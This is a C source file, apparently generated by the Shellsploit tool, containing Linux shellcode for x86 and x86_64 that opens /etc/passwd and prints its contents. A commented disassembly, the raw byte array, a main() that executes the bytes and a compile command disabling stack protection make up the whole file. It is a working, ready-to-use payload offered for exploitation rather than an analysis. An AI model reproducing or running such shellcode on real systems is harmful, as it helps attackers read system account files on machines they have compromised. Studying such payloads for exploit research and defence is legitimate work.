102 lines
No EOL
4.1 KiB
C
102 lines
No EOL
4.1 KiB
C
/*
|
|
[+] Author : B3mB4m
|
|
[~] Contact : b3mb4m@protonmail.com
|
|
[~] Project : https://github.com/b3mb4m/Shellsploit
|
|
[~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu
|
|
|
|
|
|
|
|
#If you want test it, you must compile it within x86 OS.
|
|
#Or basically you can get it with shellsploit.
|
|
#Default setthings for /etc/passwd
|
|
|
|
|
|
00000000 31C0 xor eax,eax
|
|
00000002 40 inc eax
|
|
00000003 743A jz 0x3f
|
|
00000005 31C9 xor ecx,ecx
|
|
00000007 31C0 xor eax,eax
|
|
00000009 31D2 xor edx,edx
|
|
0000000B 51 push ecx
|
|
0000000C B005 mov al,0x5
|
|
0000000E 6873737764 push dword 0x64777373
|
|
00000013 68632F7061 push dword 0x61702f63
|
|
00000018 682F2F6574 push dword 0x74652f2f
|
|
0000001D 89E3 mov ebx,esp
|
|
0000001F CD80 int 0x80
|
|
00000021 89D9 mov ecx,ebx
|
|
00000023 89C3 mov ebx,eax
|
|
00000025 B003 mov al,0x3
|
|
00000027 66BAFF0F mov dx,0xfff
|
|
0000002B 6642 inc dx
|
|
0000002D CD80 int 0x80
|
|
0000002F 31C0 xor eax,eax
|
|
00000031 31DB xor ebx,ebx
|
|
00000033 B301 mov bl,0x1
|
|
00000035 B004 mov al,0x4
|
|
00000037 CD80 int 0x80
|
|
00000039 31C0 xor eax,eax
|
|
0000003B B001 mov al,0x1
|
|
0000003D CD80 int 0x80
|
|
0000003F EB3F jmp short 0x80
|
|
00000041 5F pop edi
|
|
00000042 80770B41 xor byte [edi+0xb],0x41
|
|
00000046 48 dec eax
|
|
00000047 31C0 xor eax,eax
|
|
00000049 0402 add al,0x2
|
|
0000004B 48 dec eax
|
|
0000004C 31F6 xor esi,esi
|
|
0000004E 0F05 syscall
|
|
00000050 6681ECFF0F sub sp,0xfff
|
|
00000055 48 dec eax
|
|
00000056 8D3424 lea esi,[esp]
|
|
00000059 48 dec eax
|
|
0000005A 89C7 mov edi,eax
|
|
0000005C 48 dec eax
|
|
0000005D 31D2 xor edx,edx
|
|
0000005F 66BAFF0F mov dx,0xfff
|
|
00000063 48 dec eax
|
|
00000064 31C0 xor eax,eax
|
|
00000066 0F05 syscall
|
|
00000068 48 dec eax
|
|
00000069 31FF xor edi,edi
|
|
0000006B 40 inc eax
|
|
0000006C 80C701 add bh,0x1
|
|
0000006F 48 dec eax
|
|
00000070 89C2 mov edx,eax
|
|
00000072 48 dec eax
|
|
00000073 31C0 xor eax,eax
|
|
00000075 0401 add al,0x1
|
|
00000077 0F05 syscall
|
|
00000079 48 dec eax
|
|
0000007A 31C0 xor eax,eax
|
|
0000007C 043C add al,0x3c
|
|
0000007E 0F05 syscall
|
|
00000080 E8BCFFFFFF call dword 0x41
|
|
00000085 2F das
|
|
00000086 657463 gs jz 0xec
|
|
00000089 2F das
|
|
0000008A 7061 jo 0xed
|
|
0000008C 7373 jnc 0x101
|
|
0000008E 7764 ja 0xf4
|
|
00000090 41 inc ecx
|
|
00000091 2F das
|
|
00000092 657463 gs jz 0xf8
|
|
00000095 2F das
|
|
00000096 7061 jo 0xf9
|
|
00000098 7373 jnc 0x10d
|
|
0000009A 7764 ja 0x100
|
|
*/
|
|
|
|
|
|
//Project : https://github.com/b3mb4m/Shellsploit
|
|
//This file created with shellsploit ..
|
|
//19/01/2016 - 00:29:31
|
|
//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
|
|
|
|
unsigned char shellcode[] =
|
|
"\x31\xc0\x40\x74\x3a\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
|
|
|
|
int main(void){
|
|
(*(void(*)()) shellcode)();
|
|
} |